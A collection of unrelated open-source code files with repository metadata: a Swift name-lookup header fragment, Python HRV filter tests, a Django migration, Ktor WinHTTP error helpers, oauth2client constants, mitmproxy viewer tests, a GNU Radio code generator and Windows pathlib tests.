/// FileUnit or a Module.
/// \param loc Source location of the lookup. Used to add contextual options,
/// such as disabling macro expansions inside macro arguments.
/// \param options name lookup options. Currently only used to communicate the
/// NL_IncludeUsableFromInline option.
void lookupInModule(const DeclContext *moduleOrFile,
DeclName name,
bool hasModuleSelector,
SmallVectorImpl<ValueDecl *> &decls,
NLKind lookupKind,
ResolutionKind resolutionKind,
const DeclContext *moduleScopeContext,
SourceLoc loc, NLOptions options);
/// Performs a qualified lookup into the given module and, if necessary, its
/// reexports, observing proper shadowing rules.
void
lookupVisibleDeclsInModule(const DeclContext *moduleOrFile,
ImportPath::Access accessPath,
SmallVectorImpl<ValueDecl *> &decls,
NLKind lookupKind,
ResolutionKind resolutionKind,
const DeclContext *moduleScopeContext);
} // end namespace namelookup
} // end namespace swift
#endif
|
c
|
github
|
https://github.com/apple/swift
|
include/swift/AST/ModuleNameLookup.h
|
from unittest import TestCase
import numpy as np
from hrv.filters import moving_average, moving_median, quotient, threshold_filter
from hrv.rri import RRi
class Filter(TestCase):
def test_moving_average_order_3(self):
fake_rri = np.array([810, 830, 860, 790, 804])
rri_filt = moving_average(fake_rri, order=3)
expected = [810, 833.33, 826.66, 818, 804]
assert isinstance(rri_filt, RRi)
np.testing.assert_almost_equal(rri_filt.values, expected, decimal=2)
def test_moving_average_order_5(self):
fake_rri = np.array([810, 830, 860, 790, 804, 801, 800])
rri_filt = moving_average(fake_rri, order=5)
expected = [810, 830, 818.79, 817.0, 811.0, 801, 800]
assert isinstance(rri_filt, RRi)
np.testing.assert_almost_equal(rri_filt.values, expected, decimal=2)
def test_moving_median_oder_3(self):
fake_rri = np.array([810, 830, 860, 790, 804])
rri_filt = moving_median(fake_rri, order=3)
expected = [810, 830.0, 830.0, 804, 804]
assert isinstance(rri_filt, RRi)
np.testing.assert_almost_equal(rri_filt.values, expected, decimal=2)
def test_moving_median_order_5(self):
fake_rri = np.array([810, 830, 860, 790, 804, 801, 800])
rri_filt = moving_median(fake_rri, order=5)
expected = [810, 830, 810.0, 804.0, 801.0, 801, 800]
assert isinstance(rri_filt, RRi)
np.testing.assert_almost_equal(rri_filt.values, expected, decimal=2)
def test_quotient_filter(self):
fake_rri = [810, 580, 805, 790]
rri_filt = quotient(fake_rri)
expected = [805, 790]
assert isinstance(rri_filt, RRi)
np.testing.assert_almost_equal(rri_filt.values, expected, decimal=2)
def test_quotient_filter_receiving_and_return_rri_class(self):
fake_rri = RRi([810, 580, 805, 790])
rri_filt = quotient(fake_rri)
expected = RRi(rri=[805, 790], time=[1.385, 2.175])
assert isinstance(rri_filt, RRi)
np.testing.assert_almost_equal(rri_filt.values, expected.values, decimal=2)
np.testing.assert_almost_equal(rri_filt.time, expected.time, decimal=2)
def test_movinng_filters_receiving_and_return_rri_class(self):
fake_rri = RRi([810, 830, 860, 790, 804, 801, 800], time=[0, 1, 2, 3, 4, 5, 6])
rri_filt = moving_median(fake_rri)
expected_rri = [810, 830, 830, 804, 801, 801, 800]
expected_time = [0, 1, 2, 3, 4, 5, 6]
assert isinstance(rri_filt, RRi)
np.testing.assert_almost_equal(rri_filt.values, expected_rri, decimal=2)
np.testing.assert_almost_equal(rri_filt.time, expected_time, decimal=2)
def test_threshold_filter(self):
fake_rri = RRi([810, 830, 860, 865, 804, 1100, 800], time=[0, 1, 2, 3, 4, 5, 6])
rri_filt = threshold_filter(fake_rri, threshold=250)
expected_rri = [810, 830, 860, 865, 804, 748.40625, 800]
expected_time = [0, 1, 2, 3, 4, 5, 6]
assert isinstance(rri_filt, RRi)
np.testing.assert_almost_equal(rri_filt.values, expected_rri, decimal=2)
np.testing.assert_almost_equal(rri_filt.time, expected_time, decimal=2)
def test_threshold_filter_noise_in_the_beginning(self):
fake_rri = RRi([810, 500, 860, 865, 804, 810, 800], time=[0, 1, 2, 3, 4, 5, 6])
rri_filt = threshold_filter(fake_rri, threshold=250)
expected_rri = [810, 814.34375, 860, 865, 804, 810, 800]
expected_time = [0, 1, 2, 3, 4, 5, 6]
assert isinstance(rri_filt, RRi)
np.testing.assert_almost_equal(rri_filt.values, expected_rri, decimal=2)
np.testing.assert_almost_equal(rri_filt.time, expected_time, decimal=2)
def test_threshold_filter_string_threshold(self):
fake_rri = RRi([810, 650, 860, 865, 804, 810, 800], time=[0, 1, 2, 3, 4, 5, 6])
rri_filt = threshold_filter(fake_rri, threshold="strong")
expected_rri = [810, 814.34375, 860, 865, 804, 810, 800]
expected_time = [0, 1, 2, 3, 4, 5, 6]
assert isinstance(rri_filt, RRi)
np.testing.assert_almost_equal(rri_filt.values, expected_rri, decimal=2)
np.testing.assert_almost_equal(rri_filt.time, expected_time, decimal=2)
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
import os
from django.db import migrations, models
def create_course(Commander, Course, data):
cmdr, _ = Commander.objects.get_or_create(
name=data['created_by']
)
course, _ = Course.objects.get_or_create(
title=data['title'],
defaults={
'system': data['system'],
'course_type': data['course_type'],
'nearby_outfitting': data['nearby_outfitting'],
'distance_from_primary': data['distance_from_primary'],
'distance_from_sol': data['distance_from_sol'],
'notes': data['notes'],
'created_by': cmdr,
}
)
return course
def create_initial_courses(apps, schema_editor):
Commander = apps.get_model("cmdrs", "Commander")
Course = apps.get_model("courses", "Course")
ZeroGravityCourse = apps.get_model("courses", "ZeroGravityCourse")
SurfaceCourse = apps.get_model("courses", "SurfaceCourse")
SRVRallyCourse = apps.get_model("courses", "SRVRallyCourse")
SRVCrossCourse = apps.get_model("courses", "SRVCrossCourse")
StadiumCourse = apps.get_model("courses", "StadiumCourse")
data_dir = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'data'
)
zg_file = os.path.join(data_dir, 'zero_gravity.json')
surface_file = os.path.join(data_dir, 'surface.json')
rally_file = os.path.join(data_dir, 'srvrally.json')
cross_file = os.path.join(data_dir, 'srvcross.json')
stadium_file = os.path.join(data_dir, 'stadium.json')
with open(zg_file) as raw_zg_data:
zg_data = json.load(raw_zg_data)
for data in zg_data:
course = create_course(Commander, Course, data)
zg, _ = ZeroGravityCourse.objects.get_or_create(
course=course,
defaults={
"vehicle_type": data['course_info']['vehicle_type'],
"station_name": data['course_info']['station_name'],
"number_of_rings": data['course_info']['number_of_rings'],
"length": data['course_info']['length'],
}
)
with open(surface_file) as raw_surface_data:
surface_data = json.load(raw_surface_data)
for data in surface_data:
course = create_course(Commander, Course, data)
surface, _ = SurfaceCourse.objects.get_or_create(
course=course,
defaults={
"vehicle_type": data['course_info']['vehicle_type'],
"planet_name": data['course_info']['planet_name'],
"coordinates": data['course_info']['coordinates'],
"gravity": data['course_info']['gravity'],
}
)
with open(rally_file) as raw_rally_data:
rally_data = json.load(raw_rally_data)
for data in rally_data:
course = create_course(Commander, Course, data)
rally, _ = SRVRallyCourse.objects.get_or_create(
course=course,
defaults={
"vehicle_type": data['course_info']['vehicle_type'],
"planet_name": data['course_info']['planet_name'],
"length": data['course_info']['length'],
"start_port_name": data['course_info']['start_port_name'],
"end_port_name": data['course_info']['end_port_name'],
"starting_line": data['course_info']['starting_line'],
"finish_line": data['course_info']['finish_line'],
"gravity": data['course_info']['gravity'],
"planet_type": data['course_info']['planet_type'],
}
)
with open(cross_file) as raw_cross_data:
cross_data = json.load(raw_cross_data)
for data in cross_data:
course = create_course(Commander, Course, data)
cross, _ = SRVCrossCourse.objects.get_or_create(
course=course,
defaults={
"vehicle_type": data['course_info']['vehicle_type'],
"planet_name": data['course_info']['planet_name'],
"port_name": data['course_info']['port_name'],
"gravity": data['course_info']['gravity'],
"tidally_locked": data['course_info']['tidally_locked'],
}
)
with open(stadium_file) as raw_stadium_data:
stadium_data = json.load(raw_stadium_data)
for data in stadium_data:
course = create_course(Commander, Course, data)
stadium, _ = StadiumCourse.objects.get_or_create(
course=course,
defaults={
"vehicle_type": data['course_info']['vehicle_type'],
"planet_name": data['course_info']['planet_name'],
"port_name": data['course_info']['port_name'],
"gravity": data['course_info']['gravity'],
}
)
class Migration(migrations.Migration):
dependencies = [
('cmdrs', '0001_initial'),
('courses', '0001_initial'),
]
operations = [
migrations.RunPython(create_initial_courses),
]
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Copyright 2014-2022 JetBrains s.r.o and contributors. Use of this source code is governed by the Apache 2.0 license.
*/
package io.ktor.client.engine.winhttp.internal
import io.ktor.client.network.sockets.*
import kotlinx.cinterop.*
import platform.windows.*
import platform.winhttp.ERROR_WINHTTP_TIMEOUT
@OptIn(ExperimentalForeignApi::class)
private val winHttpModuleHandle by lazy {
GetModuleHandleW("winhttp.dll")
}
@OptIn(ExperimentalForeignApi::class)
private val languageId = makeLanguageId(LANG_NEUTRAL.convert(), SUBLANG_DEFAULT.convert())
@OptIn(ExperimentalForeignApi::class)
private val ERROR_INSUFFICIENT_BUFFER: UInt = platform.windows.ERROR_INSUFFICIENT_BUFFER.convert()
/**
* Creates an exception from last WinAPI error.
*/
internal fun getWinHttpException(message: String): Exception {
val errorCode = GetLastError()
return getWinHttpException(message, errorCode)
}
/**
* Creates an exception from WinAPI error code.
*/
internal fun getWinHttpException(message: String, errorCode: UInt): Exception {
val hResult = getHResultFromWin32Error(errorCode)
val errorMessage = getErrorMessage(errorCode).trimEnd('.')
val cause = "$message: $errorMessage. Error $errorCode (0x${hResult.toString(16)})"
return if (errorCode.toInt() == ERROR_WINHTTP_TIMEOUT) {
ConnectTimeoutException(cause)
} else {
IllegalStateException(cause)
}
}
/**
* Creates an error message from WinAPI error code.
*/
@OptIn(ExperimentalForeignApi::class)
internal fun getErrorMessage(errorCode: UInt): String {
return formatMessage(errorCode, winHttpModuleHandle)
?: formatMessage(errorCode)
?: "Unknown error"
}
/**
* Formats error code into human readable error message.
*
* @param errorCode is error code.
* @param moduleHandle is DLL handle to look for message.
*/
@OptIn(ExperimentalForeignApi::class)
private fun formatMessage(errorCode: UInt, moduleHandle: HMODULE? = null): String? = memScoped {
val formatSourceFlag = if (moduleHandle != null) {
FORMAT_MESSAGE_FROM_HMODULE
} else {
FORMAT_MESSAGE_FROM_SYSTEM
}
// Try reading error message into allocated buffer
var formatFlags = FORMAT_MESSAGE_IGNORE_INSERTS or FORMAT_MESSAGE_ARGUMENT_ARRAY or formatSourceFlag
val bufferSize = 256
val buffer = allocArray<UShortVar>(bufferSize)
var readChars = FormatMessageW(
formatFlags.convert(),
moduleHandle,
errorCode,
languageId,
buffer.reinterpret(),
bufferSize.convert(),
null
)
// Read message from buffer
if (readChars > 0u) {
return@memScoped buffer.toKStringFromUtf16(readChars.convert())
}
if (GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
return@memScoped null
}
// If the allocated buffer is too small, try to request buffer allocation
formatFlags = formatFlags or FORMAT_MESSAGE_ALLOCATE_BUFFER
val bufferPtr = alloc<CPointerVar<UShortVar>>()
readChars = FormatMessageW(
formatFlags.convert(),
moduleHandle,
errorCode,
languageId,
bufferPtr.ptr.reinterpret(),
0.convert(),
null
)
return try {
if (readChars > 0u) {
bufferPtr.value?.toKStringFromUtf16(readChars.convert())
} else {
null
}
} finally {
LocalFree(bufferPtr.value)
}
}
@OptIn(ExperimentalForeignApi::class)
private fun CPointer<UShortVar>.toKStringFromUtf16(size: Int): String {
val nativeBytes = this
var length: Int = size
while (length > 0 && nativeBytes[length - 1] <= 0x20u) {
length--
}
val chars = CharArray(length) { index ->
val nativeByte = nativeBytes[index].toInt()
val char = nativeByte.toChar()
char
}
return chars.concatToString()
}
/**
* Implements HRESULT_FROM_WIN32 macro.
*/
private fun getHResultFromWin32Error(errorCode: UInt): UInt {
return if ((errorCode and 0x80000000u) == 0x80000000u) {
errorCode
} else {
(errorCode and 0x0000FFFFu) or 0x80070000u
}
}
/**
* Implements MAKELANGID macro.
*/
private fun makeLanguageId(primaryLanguageId: UInt, subLanguageId: UInt): UInt {
return ((subLanguageId) shl 10) or primaryLanguageId
}
|
kotlin
|
github
|
https://github.com/ktorio/ktor
|
ktor-client/ktor-client-winhttp/windows/src/io/ktor/client/engine/winhttp/internal/WinHttpExceptions.kt
|
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Client library for using OAuth2, especially with Google APIs."""
__version__ = '1.5.2'
GOOGLE_AUTH_URI = 'https://accounts.google.com/o/oauth2/auth'
GOOGLE_DEVICE_URI = 'https://accounts.google.com/o/oauth2/device/code'
GOOGLE_REVOKE_URI = 'https://accounts.google.com/o/oauth2/revoke'
GOOGLE_TOKEN_URI = 'https://accounts.google.com/o/oauth2/token'
GOOGLE_TOKEN_INFO_URI = 'https://www.googleapis.com/oauth2/v2/tokeninfo'
|
unknown
|
codeparrot/codeparrot-clean
| ||
import json
from unittest import mock
from mitmproxy.test import taddons
from mitmproxy.test import tflow
from mitmproxy import flowfilter
from mitmproxy.tools.web.app import flow_to_json
from mitmproxy.tools.web import static_viewer
from mitmproxy.addons import save
def test_save_static(tmpdir):
tmpdir.mkdir('static')
static_viewer.save_static(tmpdir)
assert len(tmpdir.listdir()) == 2
assert tmpdir.join('index.html').check(file=1)
assert tmpdir.join('static/static.js').read() == 'MITMWEB_STATIC = true;'
def test_save_filter_help(tmpdir):
static_viewer.save_filter_help(tmpdir)
f = tmpdir.join('/filter-help.json')
assert f.check(file=1)
assert f.read() == json.dumps(dict(commands=flowfilter.help))
def test_save_settings(tmpdir):
static_viewer.save_settings(tmpdir)
f = tmpdir.join('/settings.json')
assert f.check(file=1)
def test_save_flows(tmpdir):
flows = [tflow.tflow(req=True, resp=None), tflow.tflow(req=True, resp=True)]
static_viewer.save_flows(tmpdir, flows)
assert tmpdir.join('flows.json').check(file=1)
assert tmpdir.join('flows.json').read() == json.dumps([flow_to_json(f) for f in flows])
@mock.patch('mitmproxy.ctx.log')
def test_save_flows_content(ctx, tmpdir):
flows = [tflow.tflow(req=True, resp=None), tflow.tflow(req=True, resp=True)]
with mock.patch('time.time', mock.Mock(side_effect=[1, 2, 2] * 4)):
static_viewer.save_flows_content(tmpdir, flows)
flows_path = tmpdir.join('flows')
assert len(flows_path.listdir()) == len(flows)
for p in flows_path.listdir():
assert p.join('request').check(dir=1)
assert p.join('response').check(dir=1)
assert p.join('request/content.data').check(file=1)
assert p.join('request/content').check(dir=1)
assert p.join('response/content.data').check(file=1)
assert p.join('response/content').check(dir=1)
assert p.join('request/content/Auto.json').check(file=1)
assert p.join('response/content/Auto.json').check(file=1)
def test_static_viewer(tmpdir):
s = static_viewer.StaticViewer()
sa = save.Save()
with taddons.context() as tctx:
sa.save([tflow.tflow(resp=True)], str(tmpdir.join('foo')))
tctx.master.addons.add(s)
tctx.configure(s, web_static_viewer=str(tmpdir), rfile=str(tmpdir.join('foo')))
assert tmpdir.join('index.html').check(file=1)
assert tmpdir.join('static').check(dir=1)
assert tmpdir.join('flows').check(dir=1)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
#
# Copyright 2004,2006,2007,2008,2009 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from build_utils import expand_template, standard_dict
from build_utils_codes import *
import re
# sources and sinks
ss_signatures = ['s', 'i', 'f', 'c']
ss_roots = [
'gr_vector_source_X',
'gr_vector_sink_X',
'gr_noise_source_X',
'gr_sig_source_X',
'gr_probe_signal_X',
'gr_probe_signal_vX'
]
# regular blocks
reg_signatures = ['ss', 'ii', 'ff', 'cc']
reg_roots = [
'gr_add_const_XX',
'gr_sub_XX',
'gr_divide_XX',
'gr_mute_XX',
'gr_add_const_vXX',
'gr_multiply_const_vXX',
'gr_integrate_XX',
'gr_moving_average_XX',
]
# other blocks
others = (
('gr_chunks_to_symbols_XX', ('bf', 'bc', 'sf', 'sc', 'if', 'ic')),
('gr_unpacked_to_packed_XX', ('bb','ss','ii')),
('gr_packed_to_unpacked_XX', ('bb','ss','ii')),
('gr_xor_XX', ('bb','ss','ii')),
('gr_and_XX', ('bb','ss','ii')),
('gr_and_const_XX', ('bb','ss','ii')),
('gr_or_XX', ('bb','ss','ii')),
('gr_not_XX', ('bb','ss','ii')),
('gr_sample_and_hold_XX', ('bb','ss','ii','ff')),
('gr_argmax_XX', ('fs','is','ss')),
('gr_max_XX', ('ff','ii','ss')),
('gr_peak_detector_XX', ('fb','ib','sb')),
('gr_multiply_XX', ('ss','ii')),
('gr_multiply_const_XX', ('ss','ii')),
('gr_add_XX', ('ss','cc','ii'))
)
def expand_h_cc_i (root, sig):
# root looks like 'gr_vector_sink_X'
name = re.sub ('X+', sig, root)
d = standard_dict (name, sig)
expand_template (d, root + '.h.t')
expand_template (d, root + '.cc.t')
expand_template (d, root + '.i.t')
def generate ():
expand_h_cc_i ('gr_add_const_XX', 'sf') # for MC4020
expand_h_cc_i ('gr_vector_sink_X', 'b')
expand_h_cc_i ('gr_vector_source_X', 'b')
expand_h_cc_i ('gr_probe_signal_X', 'b')
expand_h_cc_i ('gr_probe_signal_vX', 'b')
for r in ss_roots:
for s in ss_signatures:
expand_h_cc_i (r, s)
for r in reg_roots :
for s in reg_signatures:
expand_h_cc_i (r, s)
for root, sigs in others:
for s in sigs:
expand_h_cc_i (root, s)
if __name__ == '__main__':
generate ()
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""
Tests for Windows-flavoured pathlib.types._JoinablePath
"""
import os
import unittest
from .support import is_pypi
from .support.lexical_path import LexicalWindowsPath
if is_pypi:
from pathlib_abc import vfspath
else:
from pathlib._os import vfspath
class JoinTestBase:
def test_join(self):
P = self.cls
p = P('C:/a/b')
pp = p.joinpath('x/y')
self.assertEqual(pp, P(r'C:/a/b\x/y'))
pp = p.joinpath('/x/y')
self.assertEqual(pp, P('C:/x/y'))
# Joining with a different drive => the first path is ignored, even
# if the second path is relative.
pp = p.joinpath('D:x/y')
self.assertEqual(pp, P('D:x/y'))
pp = p.joinpath('D:/x/y')
self.assertEqual(pp, P('D:/x/y'))
pp = p.joinpath('//host/share/x/y')
self.assertEqual(pp, P('//host/share/x/y'))
# Joining with the same drive => the first path is appended to if
# the second path is relative.
pp = p.joinpath('c:x/y')
self.assertEqual(pp, P(r'c:/a/b\x/y'))
pp = p.joinpath('c:/x/y')
self.assertEqual(pp, P('c:/x/y'))
# Joining with files with NTFS data streams => the filename should
# not be parsed as a drive letter
pp = p.joinpath('./d:s')
self.assertEqual(pp, P(r'C:/a/b\./d:s'))
pp = p.joinpath('./dd:s')
self.assertEqual(pp, P(r'C:/a/b\./dd:s'))
pp = p.joinpath('E:d:s')
self.assertEqual(pp, P('E:d:s'))
# Joining onto a UNC path with no root
pp = P('//server').joinpath('share')
self.assertEqual(pp, P(r'//server\share'))
pp = P('//./BootPartition').joinpath('Windows')
self.assertEqual(pp, P(r'//./BootPartition\Windows'))
def test_div(self):
# Basically the same as joinpath().
P = self.cls
p = P('C:/a/b')
self.assertEqual(p / 'x/y', P(r'C:/a/b\x/y'))
self.assertEqual(p / 'x' / 'y', P(r'C:/a/b\x\y'))
self.assertEqual(p / '/x/y', P('C:/x/y'))
self.assertEqual(p / '/x' / 'y', P(r'C:/x\y'))
# Joining with a different drive => the first path is ignored, even
# if the second path is relative.
self.assertEqual(p / 'D:x/y', P('D:x/y'))
self.assertEqual(p / 'D:' / 'x/y', P('D:x/y'))
self.assertEqual(p / 'D:/x/y', P('D:/x/y'))
self.assertEqual(p / 'D:' / '/x/y', P('D:/x/y'))
self.assertEqual(p / '//host/share/x/y', P('//host/share/x/y'))
# Joining with the same drive => the first path is appended to if
# the second path is relative.
self.assertEqual(p / 'c:x/y', P(r'c:/a/b\x/y'))
self.assertEqual(p / 'c:/x/y', P('c:/x/y'))
# Joining with files with NTFS data streams => the filename should
# not be parsed as a drive letter
self.assertEqual(p / './d:s', P(r'C:/a/b\./d:s'))
self.assertEqual(p / './dd:s', P(r'C:/a/b\./dd:s'))
self.assertEqual(p / 'E:d:s', P('E:d:s'))
def test_vfspath(self):
p = self.cls(r'a\b\c')
self.assertEqual(vfspath(p), 'a\\b\\c')
p = self.cls(r'c:\a\b\c')
self.assertEqual(vfspath(p), 'c:\\a\\b\\c')
p = self.cls('\\\\a\\b\\')
self.assertEqual(vfspath(p), '\\\\a\\b\\')
p = self.cls(r'\\a\b\c')
self.assertEqual(vfspath(p), '\\\\a\\b\\c')
p = self.cls(r'\\a\b\c\d')
self.assertEqual(vfspath(p), '\\\\a\\b\\c\\d')
def test_parts(self):
P = self.cls
p = P(r'c:a\b')
parts = p.parts
self.assertEqual(parts, ('c:', 'a', 'b'))
p = P(r'c:\a\b')
parts = p.parts
self.assertEqual(parts, ('c:\\', 'a', 'b'))
p = P(r'\\a\b\c\d')
parts = p.parts
self.assertEqual(parts, ('\\\\a\\b\\', 'c', 'd'))
def test_parent(self):
# Anchored
P = self.cls
p = P('z:a/b/c')
self.assertEqual(p.parent, P('z:a/b'))
self.assertEqual(p.parent.parent, P('z:a'))
self.assertEqual(p.parent.parent.parent, P('z:'))
self.assertEqual(p.parent.parent.parent.parent, P('z:'))
p = P('z:/a/b/c')
self.assertEqual(p.parent, P('z:/a/b'))
self.assertEqual(p.parent.parent, P('z:/a'))
self.assertEqual(p.parent.parent.parent, P('z:/'))
self.assertEqual(p.parent.parent.parent.parent, P('z:/'))
p = P('//a/b/c/d')
self.assertEqual(p.parent, P('//a/b/c'))
self.assertEqual(p.parent.parent, P('//a/b/'))
self.assertEqual(p.parent.parent.parent, P('//a/b/'))
def test_parents(self):
# Anchored
P = self.cls
p = P('z:a/b')
par = p.parents
self.assertEqual(len(par), 2)
self.assertEqual(par[0], P('z:a'))
self.assertEqual(par[1], P('z:'))
self.assertEqual(par[0:1], (P('z:a'),))
self.assertEqual(par[:-1], (P('z:a'),))
self.assertEqual(par[:2], (P('z:a'), P('z:')))
self.assertEqual(par[1:], (P('z:'),))
self.assertEqual(par[::2], (P('z:a'),))
self.assertEqual(par[::-1], (P('z:'), P('z:a')))
self.assertEqual(list(par), [P('z:a'), P('z:')])
with self.assertRaises(IndexError):
par[2]
p = P('z:/a/b')
par = p.parents
self.assertEqual(len(par), 2)
self.assertEqual(par[0], P('z:/a'))
self.assertEqual(par[1], P('z:/'))
self.assertEqual(par[0:1], (P('z:/a'),))
self.assertEqual(par[0:-1], (P('z:/a'),))
self.assertEqual(par[:2], (P('z:/a'), P('z:/')))
self.assertEqual(par[1:], (P('z:/'),))
self.assertEqual(par[::2], (P('z:/a'),))
self.assertEqual(par[::-1], (P('z:/'), P('z:/a'),))
self.assertEqual(list(par), [P('z:/a'), P('z:/')])
with self.assertRaises(IndexError):
par[2]
p = P('//a/b/c/d')
par = p.parents
self.assertEqual(len(par), 2)
self.assertEqual(par[0], P('//a/b/c'))
self.assertEqual(par[1], P('//a/b/'))
self.assertEqual(par[0:1], (P('//a/b/c'),))
self.assertEqual(par[0:-1], (P('//a/b/c'),))
self.assertEqual(par[:2], (P('//a/b/c'), P('//a/b/')))
self.assertEqual(par[1:], (P('//a/b/'),))
self.assertEqual(par[::2], (P('//a/b/c'),))
self.assertEqual(par[::-1], (P('//a/b/'), P('//a/b/c')))
self.assertEqual(list(par), [P('//a/b/c'), P('//a/b/')])
with self.assertRaises(IndexError):
par[2]
def test_anchor(self):
P = self.cls
self.assertEqual(P('c:').anchor, 'c:')
self.assertEqual(P('c:a/b').anchor, 'c:')
self.assertEqual(P('c:\\').anchor, 'c:\\')
self.assertEqual(P('c:\\a\\b\\').anchor, 'c:\\')
self.assertEqual(P('\\\\a\\b\\').anchor, '\\\\a\\b\\')
self.assertEqual(P('\\\\a\\b\\c\\d').anchor, '\\\\a\\b\\')
def test_name(self):
P = self.cls
self.assertEqual(P('c:').name, '')
self.assertEqual(P('c:/').name, '')
self.assertEqual(P('c:a/b').name, 'b')
self.assertEqual(P('c:/a/b').name, 'b')
self.assertEqual(P('c:a/b.py').name, 'b.py')
self.assertEqual(P('c:/a/b.py').name, 'b.py')
self.assertEqual(P('//My.py/Share.php').name, '')
self.assertEqual(P('//My.py/Share.php/a/b').name, 'b')
def test_stem(self):
P = self.cls
self.assertEqual(P('c:').stem, '')
self.assertEqual(P('c:..').stem, '..')
self.assertEqual(P('c:/').stem, '')
self.assertEqual(P('c:a/b').stem, 'b')
self.assertEqual(P('c:a/b.py').stem, 'b')
self.assertEqual(P('c:a/.hgrc').stem, '.hgrc')
self.assertEqual(P('c:a/.hg.rc').stem, '.hg')
self.assertEqual(P('c:a/b.tar.gz').stem, 'b.tar')
self.assertEqual(P('c:a/trailing.dot.').stem, 'trailing.dot')
def test_suffix(self):
P = self.cls
self.assertEqual(P('c:').suffix, '')
self.assertEqual(P('c:/').suffix, '')
self.assertEqual(P('c:a/b').suffix, '')
self.assertEqual(P('c:/a/b').suffix, '')
self.assertEqual(P('c:a/b.py').suffix, '.py')
self.assertEqual(P('c:/a/b.py').suffix, '.py')
self.assertEqual(P('c:a/.hgrc').suffix, '')
self.assertEqual(P('c:/a/.hgrc').suffix, '')
self.assertEqual(P('c:a/.hg.rc').suffix, '.rc')
self.assertEqual(P('c:/a/.hg.rc').suffix, '.rc')
self.assertEqual(P('c:a/b.tar.gz').suffix, '.gz')
self.assertEqual(P('c:/a/b.tar.gz').suffix, '.gz')
self.assertEqual(P('c:a/trailing.dot.').suffix, '.')
self.assertEqual(P('c:/a/trailing.dot.').suffix, '.')
self.assertEqual(P('//My.py/Share.php').suffix, '')
self.assertEqual(P('//My.py/Share.php/a/b').suffix, '')
def test_suffixes(self):
P = self.cls
self.assertEqual(P('c:').suffixes, [])
self.assertEqual(P('c:/').suffixes, [])
self.assertEqual(P('c:a/b').suffixes, [])
self.assertEqual(P('c:/a/b').suffixes, [])
self.assertEqual(P('c:a/b.py').suffixes, ['.py'])
self.assertEqual(P('c:/a/b.py').suffixes, ['.py'])
self.assertEqual(P('c:a/.hgrc').suffixes, [])
self.assertEqual(P('c:/a/.hgrc').suffixes, [])
self.assertEqual(P('c:a/.hg.rc').suffixes, ['.rc'])
self.assertEqual(P('c:/a/.hg.rc').suffixes, ['.rc'])
self.assertEqual(P('c:a/b.tar.gz').suffixes, ['.tar', '.gz'])
self.assertEqual(P('c:/a/b.tar.gz').suffixes, ['.tar', '.gz'])
self.assertEqual(P('//My.py/Share.php').suffixes, [])
self.assertEqual(P('//My.py/Share.php/a/b').suffixes, [])
self.assertEqual(P('c:a/trailing.dot.').suffixes, ['.dot', '.'])
self.assertEqual(P('c:/a/trailing.dot.').suffixes, ['.dot', '.'])
def test_with_name(self):
P = self.cls
self.assertEqual(P(r'c:a\b').with_name('d.xml'), P(r'c:a\d.xml'))
self.assertEqual(P(r'c:\a\b').with_name('d.xml'), P(r'c:\a\d.xml'))
self.assertEqual(P(r'c:a\Dot ending.').with_name('d.xml'), P(r'c:a\d.xml'))
self.assertEqual(P(r'c:\a\Dot ending.').with_name('d.xml'), P(r'c:\a\d.xml'))
self.assertRaises(ValueError, P(r'c:a\b').with_name, r'd:\e')
self.assertRaises(ValueError, P(r'c:a\b').with_name, r'\\My\Share')
def test_with_stem(self):
P = self.cls
self.assertEqual(P('c:a/b').with_stem('d'), P('c:a/d'))
self.assertEqual(P('c:/a/b').with_stem('d'), P('c:/a/d'))
self.assertEqual(P('c:a/Dot ending.').with_stem('d'), P('c:a/d.'))
self.assertEqual(P('c:/a/Dot ending.').with_stem('d'), P('c:/a/d.'))
self.assertRaises(ValueError, P('c:a/b').with_stem, 'd:/e')
self.assertRaises(ValueError, P('c:a/b').with_stem, '//My/Share')
def test_with_suffix(self):
P = self.cls
self.assertEqual(P('c:a/b').with_suffix('.gz'), P('c:a/b.gz'))
self.assertEqual(P('c:/a/b').with_suffix('.gz'), P('c:/a/b.gz'))
self.assertEqual(P('c:a/b.py').with_suffix('.gz'), P('c:a/b.gz'))
self.assertEqual(P('c:/a/b.py').with_suffix('.gz'), P('c:/a/b.gz'))
# Path doesn't have a "filename" component.
self.assertRaises(ValueError, P('').with_suffix, '.gz')
self.assertRaises(ValueError, P('/').with_suffix, '.gz')
self.assertRaises(ValueError, P('//My/Share').with_suffix, '.gz')
# Invalid suffix.
self.assertRaises(ValueError, P('c:a/b').with_suffix, 'gz')
self.assertRaises(ValueError, P('c:a/b').with_suffix, '/')
self.assertRaises(ValueError, P('c:a/b').with_suffix, '\\')
self.assertRaises(ValueError, P('c:a/b').with_suffix, 'c:')
self.assertRaises(ValueError, P('c:a/b').with_suffix, '/.gz')
self.assertRaises(ValueError, P('c:a/b').with_suffix, '\\.gz')
self.assertRaises(ValueError, P('c:a/b').with_suffix, 'c:.gz')
self.assertRaises(ValueError, P('c:a/b').with_suffix, 'c/d')
self.assertRaises(ValueError, P('c:a/b').with_suffix, 'c\\d')
self.assertRaises(ValueError, P('c:a/b').with_suffix, '.c/d')
self.assertRaises(ValueError, P('c:a/b').with_suffix, '.c\\d')
self.assertRaises(TypeError, P('c:a/b').with_suffix, None)
